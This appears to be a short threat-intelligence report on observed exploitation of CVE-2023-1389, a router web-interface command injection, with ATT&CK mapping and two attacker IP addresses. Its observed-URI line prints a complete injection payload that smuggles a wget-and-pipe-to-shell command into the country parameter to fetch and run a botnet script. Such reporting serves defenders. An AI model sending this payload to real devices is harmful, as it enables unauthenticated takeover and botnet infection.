OpenWRT Luci CGI Command Injection (CVE-2023-1389) for 2026-03-13

Mar 13, 2026 WebExploit

Last Updated: 12:12 UTC

Unauthenticated OS command injection via the country parameter of /cgi-bin/luci/;stok=/locale. The ;stok= path segment bypasses CSRF token validation, making the injection exploitable without credentials. Active exploitation payloads download and execute Mirai-family botnet implants via wget or curl from attacker-controlled infrastructure.

CVE References

CVE-2023-1389

MITRE ATT&CK

Tactic: Initial Access (TA0001)
Technique: T1190 — Exploit Public-Facing Application

Observed URIs

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh)
/cgi-bin/luci/;stok=/locale

Attackers by Country

IP Address : ASN : City/Provider

221.159.119.6 : unknown : unknown
95.214.55.63 : unknown : unknown

Share on: